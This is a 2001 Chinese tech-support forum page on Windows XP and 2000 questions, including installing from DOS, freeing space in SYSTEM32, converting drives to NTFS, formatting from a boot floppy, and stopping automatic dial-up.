 发表于 2001-12-07 12:04:22 按此观看BIGBUG的个人资料 按此发邮件给BIGBUG BIGBUG 的 oicq 是9718783,查看 9718783 的资料 发送悄悄话给BIGBUG 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看BIGBUG的IP
关于中文中文之星根本没必要除了上面我说的外，如果还是不行建议你用中文版吧（其实E文也可以）
输入法可以单独安装，网上下载很多，有些免费的比如“清华紫光拼音”，office碟里也有（微软拼音、五笔等）
至于Fdisk的使用，如果你的E文够好可以直接试试，不然的话建议找点DOS基础资料看看，简单点说：进入fdisk选3，进去删除非DOS分区，ESC出来后进1的1建立C：
如果你在DOS下看到C：（XP所在盘），则不用fdisk

等我想想再签
自由光束

终级用户
积分：936
发帖：291
来自：中国·哈尔滨
注册：2000-12-09
 发表于 2001-12-07 18:28:17 按此观看自由光束的个人资料 按此发邮件给自由光束 访问自由光束的主页 自由光束 的 oicq 是2905924,查看 2905924 的资料 发送悄悄话给自由光束 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看自由光束的IP
windowsXP的兼容模式，可以按装98下的所有应用软件！

人活着就应该有梦想，如果人活着没有梦想，那和咸鱼有什么区别？
个人主页： http://sunber.home.sohu.com
上一贴 | 下一贴
快速回复 | 主题：帮帮忙吧！关于WINDOWS XP的问题
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


关于注册表

计算机技术
关于注册表

上一贴 | 下一贴
发表人 | 主题: 关于注册表
lgkdi 初级用户 积分：13 发帖：4 来自： 注册：2001-12-06 | 发表于 2001-12-06 18:39:07 按此观看lgkdi的个人资料 按此发邮件给lgkdi lgkdi 的 oicq 是25113059,查看 25113059 的资料 收藏该主题供以后查看 发送悄悄话给lgkdi 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看lgkdi的IP 我的注册表被禁用的，我该怎么办呀！谢谢！ 为了成功，而执著的追求！
yunbin 经典强盗 现任版主 积分：2292 发帖：1001 来自：火星 注册：2001-09-27 | 发表于 2001-12-06 19:09:27 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP 页面：点这儿参观 A man can succeed at almost anything for which he has unlimited enthusiasm. Blueidea Web Team Moderator Of Computer Technology Forum
yuzhiqing 终级用户 积分：682 发帖：417 来自：中国湖北 注册：2001-04-01 | 发表于 2001-12-06 21:29:31 按此观看yuzhiqing的个人资料 按此发邮件给yuzhiqing 访问yuzhiqing的主页 yuzhiqing 的 oicq 是51998,查看 51998 的资料 发送悄悄话给yuzhiqing 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yuzhiqing的IP 如果是软件禁用，直接用软件恢复！~ WINDFLASH ::浅紫色FORUM::
天黑黑 初级用户 积分：0 发帖：2 来自： 注册：2001-12-06 | 发表于 2001-12-06 23:39:57 按此观看天黑黑的个人资料 按此发邮件给天黑黑 访问天黑黑的主页 天黑黑 的 oicq 是33066276,查看 33066276 的资料 发送悄悄话给天黑黑 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看天黑黑的IP 到这个网站,点击网站中间的红色文字，上面有说明~！ 不用看了，我没有个性的！
jorkof 终级用户 积分：1197 发帖：367 来自：北京 注册：2001-06-16 | 发表于 2001-12-07 06:28:50 按此观看jorkof的个人资料 按此发邮件给jorkof 访问jorkof的主页 jorkof 的 oicq 是3707274,查看 3707274 的资料 发送悄悄话给jorkof 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看jorkof的IP 解注册表禁用的软件很多侠客你有吗？就可以 ≮曾经沧海难为水jorkof.my163.com除却巫山不是云≯
上一贴 | 下一贴
快速回复 | 主题：关于注册表
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


WIN2000的SYSTEM32目录已经大的怕人了，怎么办！

计算机技术
WIN2000的SYSTEM32目录已经大的怕人了，怎么办！

上一贴 | 下一贴
发表人 主题: WIN2000的SYSTEM32目录已经大的怕人了，怎么办！
阿Q

酷酷的老Q
积分：992
发帖：358
来自：大海
注册：1999-12-22
 发表于 2001-12-06 19:08:24 按此观看阿Q的个人资料 按此发邮件给阿Q 访问阿Q的主页 阿Q 的 oicq 是2085094,查看 2085094 的资料 收藏该主题供以后查看 发送悄悄话给阿Q 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看阿Q的IP
我的服务器说日志空间不足了，我一看C盘的空间只有4K，SYSTEM32目录足有2个G大，怎么办？

================
人生的路艰辛而漫长，但我相信，前方总有希望......
OICQ:2085094
yunbin

经典强盗
现任版主
积分：2292
发帖：1001
来自：火星
注册：2001-09-27
 发表于 2001-12-06 19:14:47 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
移动事件记录文件位置
  Win2000的事件记录会时刻记录事件活动情况。记录文件的位置在C:\Windows\System32\Config中，如果把它保存在另一个硬盘或分区中，就能减轻系统所在硬盘或分区的负担，达到优化目的。方法是在下列分支中：
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Eventlog\Security
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Eventlog\Application
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Eventlog\System
将其中项值Flie的路径都改为另一个硬盘或分区中的目录，比如：D:\config\AppEvent.Evt、D:\config\SecEvent.Evt、D:\config\SysEvent.Evt。

Win2000的System和System32目录下有大量的DLL文件，被系统或应用软件共享。由于经常安装和卸载软件，会在这些目录中留下一些DLL垃圾文件，它们不但占用硬盘空间，而且还降低系统的运行速度。可按以下方法删除：在HKEY_LOCAL_ MACHINE\\Software\\Microsoft\\Windows

\\CurrentVersion\\SharedDLLs中，存放有软件共享的DLL路径信息，每个DLL文件的项值表明它已被几个应用软件共享.如果已卸载的软件该项值为0，则说明不被任何软件共享，可以删除之，然后再删除对应的DLL文件。

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

阿Q

酷酷的老Q
积分：992
发帖：358
来自：大海
注册：1999-12-22
 发表于 2001-12-11 10:12:00 按此观看阿Q的个人资料 按此发邮件给阿Q 访问阿Q的主页 阿Q 的 oicq 是2085094,查看 2085094 的资料 发送悄悄话给阿Q 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看阿Q的IP
有没有清理SYSTEM32目录垃圾的软件呢？

================
人生的路艰辛而漫长，但我相信，前方总有希望......
OICQ:2085094
上一贴 | 下一贴
快速回复 | 主题：WIN2000的SYSTEM32目录已经大的怕人了，怎么办！
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


为什么安装xp后会这样？？

计算机技术
为什么安装xp后会这样？？

上一贴 | 下一贴
发表人 主题: 为什么安装xp后会这样？？
kjseven

终级用户
积分：544
发帖：170
来自：
注册：2001-11-13
 发表于 2001-12-08 10:23:46 按此观看kjseven的个人资料 按此发邮件给kjseven 收藏该主题供以后查看 发送悄悄话给kjseven 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看kjseven的IP
在安装的时候我明明选了单独安装呀，可是装了之后，里面的原来的程序还在里面，只是，全部都要重新输入注册序号，为什么会这样呀？
怎样搞才能全部洗掉啊？
具体步骤？
谢谢。
greenyang

终级用户
积分：799
发帖：235
来自：山东莱阳
注册：2001-09-11
 发表于 2001-12-08 15:36:56 按此观看greenyang的个人资料 按此发邮件给greenyang 访问greenyang的主页 greenyang 的 oicq 是2114123,查看 2114123 的资料 发送悄悄话给greenyang 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看greenyang的IP
format

是　谁　无　事　种　芭　蕉，
早　也　潇　潇，晚　也　潇　潇　！
kjseven

终级用户
积分：544
发帖：170
来自：
注册：2001-11-13
 发表于 2001-12-08 17:10:32 按此观看kjseven的个人资料 按此发邮件给kjseven 发送悄悄话给kjseven 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看kjseven的IP
使用98启动盘居然不能启动，插入盘，重开机，结果？？还是进入了windows.
我试了十几次了，搞到我的头都通了。？？？？？？？？？？？？？？？？？？
imacwei

终级用户
积分：2243
发帖：1041
来自：China.Jiangs
注册：2001-07-23
 发表于 2001-12-09 16:21:13 按此观看imacwei的个人资料 按此发邮件给imacwei 访问imacwei的主页 imacwei 的 oicq 是36110975,查看 36110975 的资料 发送悄悄话给imacwei 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看imacwei的IP
呵呵…去BIOS看看，是不是将启动设置成为C Only了！

Loading…………
WINDOWS2000-SP2+IE5.5
FIREWORKS,the solution for professional Web graphic design and production.
Press Anykey To Continue…

iMacWei
yuzhiqing

终级用户
积分：682
发帖：417
来自：中国湖北
注册：2001-04-01
 发表于 2001-12-09 21:18:41 按此观看yuzhiqing的个人资料 按此发邮件给yuzhiqing 访问yuzhiqing的主页 yuzhiqing 的 oicq 是51998,查看 51998 的资料 发送悄悄话给yuzhiqing 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yuzhiqing的IP
1,你可能用的测试版
2，在bois 用a:启动

WINDFLASH
::浅紫色FORUM::
闪亮源码

闪亮源码
积分：1680
发帖：889
来自：
注册：2001-02-09
 发表于 2001-12-09 21:31:29 按此观看闪亮源码的个人资料 按此发邮件给闪亮源码 访问闪亮源码的主页 闪亮源码 的 oicq 是534289,查看 534289 的资料 发送悄悄话给闪亮源码 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看闪亮源码的IP
由于Windows XP 操作系统是NT内核的操作系统，它的安装和Windows 2000/NT4.0基本相同，和 Windows 9x系统的安装差别比较大，考虑到很多朋友对NT系统的安装不熟悉，所以我在这里特意写一下安装的步骤和及注意事项，供大家参考。
    在Windows 下安装Windows XP

    插入Windows XP光盘，就会自动运行，出现安装界面，点击"安装"。如果没有自动运行，请双击光盘根目录的setup.exe开始安装。在重新启动电脑前，安装过程中会有几个选项，需要注意的是：如果你打算把Windows XP 安装到其它分区而不是C盘，你要注意点击"高级"选项，然后记得选择"安装过程中选择分区"一项，不然重新启动后的安装过程你将无法选择安装的分区。

    在DOS下安装

    这种情况可能是新买的电脑，或是Windows 系统无法进入。会选择在DOS下安装的。NT系统和9x系统不一样，它在DOS下的安装不像安装Windows 98一样，敲入setup.exe就可以了，而是先加载smartdrv.exe,然后运行/i386目录下的winnt.exe。
    具体操作方法如下：
    假设smartdrv.exe这个文件在A盘，光驱为G盘(注：这个文件在windows 9x的光盘上有或是 windows 9x系统的windows 目录下有)

a:\smartdrv.exe
a:\g:
g:\cd i386
g:\i386\winnt.exe

    这样就可以了，一定要记住加载smartdrv.exe不然，呵呵，你等上一个晚上也安装不完Windows XP.

    其它注意的问题----NTFS

    关于NTFS的选择，如果你想安装多个操作系统，请记住不要把C盘转化为NTFS。具体如关于NTFS和FAT32在FAT文件系统方面的区别，请察看其他文档，这里就不细说了。如果你不知道该不该把它转换为NTFS,一个简单的办法就是用FAT32,选择"不转换"。在你了解了NTFS后，在命令行模式下可用convert.exe这个可执行文件来随时转化的，如"convert c: /fs:ntfs"把c盘转化为NTFS。

    NTFS对于大多数普通用户来说，它的优点在于支持文件加密。Windows XP像Windows 2000 一样，支持多用户使用，而且它支持在不注销当前用户的情况下，切换到另外一个用户，这就是所谓的快速切换用户。用NTFS文件系统时，不同的用户可以加密自己的文档，而其他用户是无法访问的。比如，当前是pccat帐户登陆的，我加密了a.txt,然后快速切换到whislter用户登陆，whistler用户点击a.txt时，系统会提示你没有访问这个文件的权利的。对普通用户来说，NTFS的另外一个的优点就是它能够很好的支持大硬盘，且硬盘分配单元非常小，减少了磁盘碎片的产生。而且，大家熟悉的CIH病毒在NTFS文件系统下是没有办法传播的，使用NTFS的用户根本不需要理会CIH的，当然现在CIH早已失去了以前的威力，但是我想说的是NTFS文件系统比FAT32安全。

DOS和Windows 9x系统不能访问NTFS，这也算是NTFS的安全特色，但也是它的一个缺点。比如很多朋友喜欢用GHOST软件备份系统，GHOST的备份程序在XP/NT下是不能运行的，必须在DOS下运行，而且文件放到FAT32分区上的，另外为了在某些紧急状态下访问一些文件，需要留一个分区为FAT32。总的来说，NTFS文件系统是一种不错的文件系统，推荐使用，至少你可以把你安装程序的分区转化为NTFS。当然，NTFS文件系统还有很多优点，如磁盘配额，磁盘压缩，有利于用户管理等等，不过我认为这些对于个人普通用户不是很重要的，那些主要是针对企业用户，域模式下的客户机和服务器的。

kjseven

终级用户
积分：544
发帖：170
来自：
注册：2001-11-13
 发表于 2001-12-10 16:08:38 按此观看kjseven的个人资料 按此发邮件给kjseven 发送悄悄话给kjseven 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看kjseven的IP
现在我又碰到另一个问题啊，我已经使用启动盘成功开机了！！！！好开心哦。。。。。
但是我不能format啊，我输入命令format c: ,却显示 ........
A:/>format c:
Format not supported on drive c:
Format terminated.

为什么啊？？

gate

初级用户
积分：22
发帖：25
来自：浙江
注册：2001-10-30
 发表于 2001-12-11 11:00:54 按此观看gate的个人资料 按此发邮件给gate 发送悄悄话给gate 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看gate的IP
启动分区搞错了，激活的搞错了

享受每一天！
poorfish

经典圣僧
现任版主
积分：10941
发帖：3503
来自：江西萍乡
注册：2000-12-04
 发表于 2001-12-11 11:08:01 按此观看poorfish的个人资料 按此发邮件给poorfish 访问poorfish的主页 poorfish 的 oicq 是1525464,查看 1525464 的资料 发送悄悄话给poorfish 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看poorfish的IP
kjseven在上个帖子中说
引用:
现在我又碰到另一个问题啊，我已经使用启动盘成功开机了！！！！好开心哦。。。。。
但是我不能format啊，我输入命令format c: ,却显示 ........
A:/>format c:
Format not supported on drive c:
Format terminated.

为什么啊？？

你进的不是WINDOWS下的DOS吧?

【DW版常见问题解答】【破废墟】

Blueidea Web Team
Moderator of DW & JS Forum

kjseven

终级用户
积分：544
发帖：170
来自：
注册：2001-11-13
 发表于 2001-12-12 12:00:27 按此观看kjseven的个人资料 按此发邮件给kjseven 发送悄悄话给kjseven 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看kjseven的IP
谢谢大家，通过你们的帮忙，再加上我的努力，已经将xp完完全全的安装了。。。
可惜我可是个问题专家呀，我的键盘右边的打数字的部分不能用啊，我想应该是驱动程序的问题，所以寻找了很久，却连佩带键盘来的驱动程序也不能安装。
我的键盘是hp的有很多快捷功能健的那个。。。（我不知道叫什么名字啊）。。。哈哈。。
还有，我想打一些有声调的字母，好似西班牙语里面的哪些。。
也不能打呀，即使切换到spanish的键盘。。。
嘿嘿

坏笑
积分：403
发帖：524
来自：
注册：2001-10-06
 发表于 2001-12-12 14:26:09 按此观看嘿嘿的个人资料 按此发邮件给嘿嘿 嘿嘿 的 oicq 是42323447,查看 42323447 的资料 发送悄悄话给嘿嘿 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看嘿嘿的IP
kjseven在上个帖子中说
引用:
我的键盘右边的打数字的部分不能用啊，

num lock键按下了吗？

缘是天定,份在人为.
kjseven

终级用户
积分：544
发帖：170
来自：
注册：2001-11-13
 发表于 2001-12-12 15:02:13 按此观看kjseven的个人资料 按此发邮件给kjseven 发送悄悄话给kjseven 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看kjseven的IP
真的，我忘了按那个健，num lock，，越来越感觉到我真得很来。。。。
谢谢。。
上一贴 | 下一贴
快速回复 | 主题：为什么安装xp后会这样？？
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


在XP中如何将磁盘的格式转换成NTFS格式？？？

计算机技术
在XP中如何将磁盘的格式转换成NTFS格式？？？

上一贴 | 下一贴
发表人 主题: 在XP中如何将磁盘的格式转换成NTFS格式？？？
yixinguy78

终级用户
积分：526
发帖：188
来自：china
注册：2001-02-10
 发表于 2001-12-14 11:03:23 按此观看yixinguy78的个人资料 按此发邮件给yixinguy78 收藏该主题供以后查看 发送悄悄话给yixinguy78 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yixinguy78的IP
会丢失数据吗？我看过书上说在“运行”里边执行“CONVERT 驱动器：/FSA：NTFS[/V]”
可是不管用？？？？？？？？

？？？？？？？？？？？？？！！！！！！！！！！！！！！
张无忌

win1st
管理员
积分：7148
发帖：3108
来自：Blueidea.com
注册：2000-09-10
 发表于 2001-12-14 13:51:00 按此观看张无忌的个人资料 按此发邮件给张无忌 访问张无忌的主页 发送悄悄话给张无忌 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看张无忌的IP
我先说一句：如果是个人使用的计算机，有必要转ntfs吗？不好啦，还是别！

去xp的光盘里面找找CONVERT

只用一样东西，不明白它的道理，实在不高明

Blueidea Web Team
Team Member

yixinguy78

终级用户
积分：526
发帖：188
来自：china
注册：2001-02-10
 发表于 2001-12-14 14:00:04 按此观看yixinguy78的个人资料 按此发邮件给yixinguy78 发送悄悄话给yixinguy78 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yixinguy78的IP
用NTFS格式不是可以提高访问速度吗？？？还可以提高磁盘的利用率，减少磁盘碎片吗？？？？

？？？？？？？？？？？？？！！！！！！！！！！！！！！
张无忌

win1st
管理员
积分：7148
发帖：3108
来自：Blueidea.com
注册：2000-09-10
 发表于 2001-12-14 14:21:20 按此观看张无忌的个人资料 按此发邮件给张无忌 访问张无忌的主页 发送悄悄话给张无忌 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看张无忌的IP
那是对服务器而言的！

你自己体会一下就知道了，我个人觉得用ntfs速度上没什么改变，反而增多了磁盘的读取频度。关于碎片什么的，感觉不出来。而且ntfs下面的数据，将会在其他操作系统下无法读取，这点特不爽，也就是说如果我换个98用，那以前ntfs中的数据就废了。dos,98,2000,重装的新xp都无法读取原来的ntfs数据，烦死你的！

只用一样东西，不明白它的道理，实在不高明

Blueidea Web Team
Team Member

yixinguy78

终级用户
积分：526
发帖：188
来自：china
注册：2001-02-10
 发表于 2001-12-14 15:06:18 按此观看yixinguy78的个人资料 按此发邮件给yixinguy78 发送悄悄话给yixinguy78 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yixinguy78的IP
谢谢高人指点，那我也不变了！！！！！！！！！！！！！！

？？？？？？？？？？？？？！！！！！！！！！！！！！！
51windows

海娃
积分：2284
发帖：682
来自：湖南－山东
注册：2001-12-02
 发表于 2001-12-14 15:22:00 按此观看51windows的个人资料 按此发邮件给51windows 访问51windows的主页 51windows 的 oicq 是528173,查看 528173 的资料 发送悄悄话给51windows 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看51windows的IP
相信大家都已经注意到，在安装Windows 2000的时候，系统会询问我们是否使用NTFS文件格式。那么到底什么是NTFS格式，它有些什么优点呢？NTFS原来主要用于Windows NT，它除具有FAT文件系统的所有优点之外，还提供如下的FAT或FAT32文件系统所没有的特性：

    1、 NTFS支持文件加密和分别管理功能，可为用户提供更高层次的安全保证。

    2、 NTFS具有更好的磁盘压缩性能，可进一步满足小硬盘用户的需要。

    3、 NTFS最大支持高达2TB的大硬盘，而且它的性能不会随着磁盘容量的增大而降低。

    由此可见，NTFS格式具有许多独特的优点，不过它也有一个致命的缺点，那就是该磁盘文件格式不能被除它自己之外的其他操作系统所识别(NT 4.0也不例外)，这就对数据交流造成了一定的影响。因此凡是只使用Windows 2000的用户应首选使用NTFS格式，要是同时使用Windows 2000和其他操作系统的用户则应谨慎从事。最好将磁盘划分为多个不同的磁盘分区，将Windows 2000安装到其中的一个磁盘分区并选择使用NTFS格式；将其他操作系统安装到另外的磁盘分区中并使用FAT或FAT32格式。

    前面我们提到，NTFS文件格式具有FAT及FAT32等文件格式所不能企及的优点，因此许多用户都希望将原有磁盘系统转换为NTFS格式。为此，我们可采取以下几种不同方法：

    1、用户开始安装Windows 2000时，系统会要求用户选择安装Windows 2000的磁盘分区的格式，我们只需从中选择“用NTFS文件系统格式化磁盘分区”选项，Windows 2000的安装程序就会自动对用户指定磁盘分区进行格式化，并将文件转换为NTFS格式。

    2、用户的Windows 2000已经安装完成时，我们再要将某个磁盘分区转换为NTFS格式，则应事先将需要转换磁盘分区中的所有信息全部备份下来，然后在资源管理器或我的电脑中右击该磁盘分区并选择“格式化”命令。接下来我们应在“文件系统”栏中选择“NTFS”格式并根据需要选择“分配单元大小”、是否使用快速格式化功能、以及是否采用压缩方式等选项(选择“分配单元大小”以及是否采用压缩方式都是NTFS所独有的功能)。设置完毕之后单击“开始”按钮，系统就会对用户选择的驱动器进行格式化，并将其转换为NTFS格式。

    3、前面介绍的两种方法都需要重新格式化硬盘，这对那些在硬盘中保存了大量重要数据的用户来说是无法接受的！别着急，系统特意提供了无损转换的功能，我们只需单击Win+R快捷键，打开Windows 2000的运行对话框，然后在“打开”栏中输入“Convert X: /fs:ntfs”(其中X为用户需要转换为NTFS格式的磁盘分区)命令，系统就会自动将用户指定的磁盘分区转换为NTFS格式，并将该磁盘分区中原有的数据全部保留下来。

    4、前面介绍的Convert虽然可以很好地解决NTFS格式的无损转换问题，但我们要对系统所在的系统磁盘分区进行处理(也就是它不能对当前Windows 2000系统分区进行处理！！！)。在这种情况下，使用分区魔术师可能就成为我们惟一的选择了。

    分区魔术师是一个非常出色的磁盘分区管理软件，除了常规的磁盘分区功能之外，还有一个非常重要的功能就是能够实现不同磁盘格式之间的无损转换，将其他分区格式无损转换为NTFS格式当然也不在话下。为此，我们只需启动分区魔术师，然后右击需要转换为NTFS的磁盘，并从弹出的快捷菜单“转换”子菜单中执行“FAT到NTFS”或“FAT32到NTFS”命令即可，迅速、干净、利落。
----------------------------------

Blueidea Web Team.
Moderator Of Amphitheater Forum
.::天天学习:好好向上::. www.51windows.com
系统出问题了?请看！

BIGBUG

终级用户
积分：1095
发帖：720
来自：不一定
注册：2001-03-21
 发表于 2001-12-14 17:26:54 按此观看BIGBUG的个人资料 按此发邮件给BIGBUG BIGBUG 的 oicq 是9718783,查看 9718783 的资料 发送悄悄话给BIGBUG 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看BIGBUG的IP
在XP下，运行cmd，转到C：下
键入convert（空格）C:（空格） /fs:ntfs（空格）/v回车 注：不含括号

之后重启，你会看到转换过程

不损失任何数据

等我想想再签
软硬兼施

终级用户
积分：465
发帖：295
来自：net
注册：2001-08-03
 发表于 2001-12-14 23:33:09 按此观看软硬兼施的个人资料 按此发邮件给软硬兼施 软硬兼施 的 oicq 是18245854,查看 18245854 的资料 发送悄悄话给软硬兼施 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看软硬兼施的IP
XP光盘里有呀！

但好像要重装呀~~~~~~~

^^
HappyWalker

高级用户
积分：259
发帖：144
来自：福建省－福州市
注册：2001-02-03
 发表于 2001-12-15 13:18:28 按此观看HappyWalker的个人资料 按此发邮件给HappyWalker 访问HappyWalker的主页 HappyWalker 的 oicq 是18571576,查看 18571576 的资料 发送悄悄话给HappyWalker 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看HappyWalker的IP
ntfs的格式win9x是不可以读取数据的，不过已经有一中软件可以实现在win9x中往ntfs盘读写数据了

**********************************

我自横刀向天笑，去留肝胆两昆仑

**********************************

imacwei

终级用户
积分：2243
发帖：1041
来自：China.Jiangs
注册：2001-07-23
 发表于 2001-12-15 19:53:18 按此观看imacwei的个人资料 按此发邮件给imacwei 访问imacwei的主页 imacwei 的 oicq 是36110975,查看 36110975 的资料 发送悄悄话给imacwei 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看imacwei的IP
XP里面好像很简单的哦，直接鼠标右键－格式化然后选择NTFS就可以了阿！呵呵…

Loading…………
WINDOWS2000-SP2+IE5.5
FIREWORKS,the solution for professional Web graphic design and production.
Press Anykey To Continue…

iMacWei
上一贴 | 下一贴
快速回复 | 主题：在XP中如何将磁盘的格式转换成NTFS格式？？？
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


XP目前有多少种版本？

计算机技术
XP目前有多少种版本？

上一贴 | 下一贴
发表人 | 主题: XP目前有多少种版本？
netant 终级用户 积分：587 发帖：517 来自：欠发达地区 注册：2001-05-14 | 发表于 2001-12-15 22:27:37 按此观看netant的个人资料 按此发邮件给netant 访问netant的主页 netant 的 oicq 是64188400,查看 64188400 的资料 收藏该主题供以后查看 发送悄悄话给netant 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看netant的IP 我的2000完了，我想装XP了，装哪个版本比较好呢？ 我发现我上次用的签名档太没有个性了
len SlowHorse 积分：1192 发帖：568 来自：hebei 注册：2001-09-29 | 发表于 2001-12-15 22:36:10 按此观看len的个人资料 按此发邮件给len len 的 oicq 是3248586,查看 3248586 的资料 发送悄悄话给len 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看len的IP 还是WIN2K较好，XP目前没有很完美的版本。 Dripping water wears away a stone.
hellslayer 初级用户 积分：20 发帖：251 来自：不能上网的学校 注册：2001-04-04 | 发表于 2001-12-15 23:16:11 按此观看hellslayer的个人资料 按此发邮件给hellslayer hellslayer 的 oicq 是4369873,查看 4369873 的资料 发送悄悄话给hellslayer 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看hellslayer的IP 2600的版本号是最终的零售版，但是现在多见的中文版是加补丁的中文。而且还有个完美破解跟普通破解的版本。很复杂，如果不是为了追求华丽的截面，2K足够用了 "我亦终将屈服于死亡，但在那之前，让我赢得荣耀吧"
上一贴 | 下一贴
快速回复 | 主题：XP目前有多少种版本？
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


在xp里，我一开电脑就自动上网。我不想这样，怎算？

计算机技术
在xp里，我一开电脑就自动上网。我不想这样，怎算？

上一贴 | 下一贴
发表人 | 主题: 在xp里，我一开电脑就自动上网。我不想这样，怎算？
kjseven 终级用户 积分：544 发帖：170 来自： 注册：2001-11-13 | 发表于 2001-12-16 03:27:59 按此观看kjseven的个人资料 按此发邮件给kjseven 收藏该主题供以后查看 发送悄悄话给kjseven 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看kjseven的IP 问题同上。
赵鹏 初级用户 积分：9 发帖：1191 来自：福建福州 注册：2001-04-02 | 发表于 2001-12-16 13:42:04 按此观看赵鹏的个人资料 按此发邮件给赵鹏 赵鹏 的 oicq 是7070770,查看 7070770 的资料 发送悄悄话给赵鹏 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看赵鹏的IP 控制面板>Internet属性>连接 从不进行拨叫连接 去年元夜时 花市灯如昼 月上柳梢头 人约黄昏后 今年元夜时 月与灯依旧 不见去年人 泪湿青衫袖
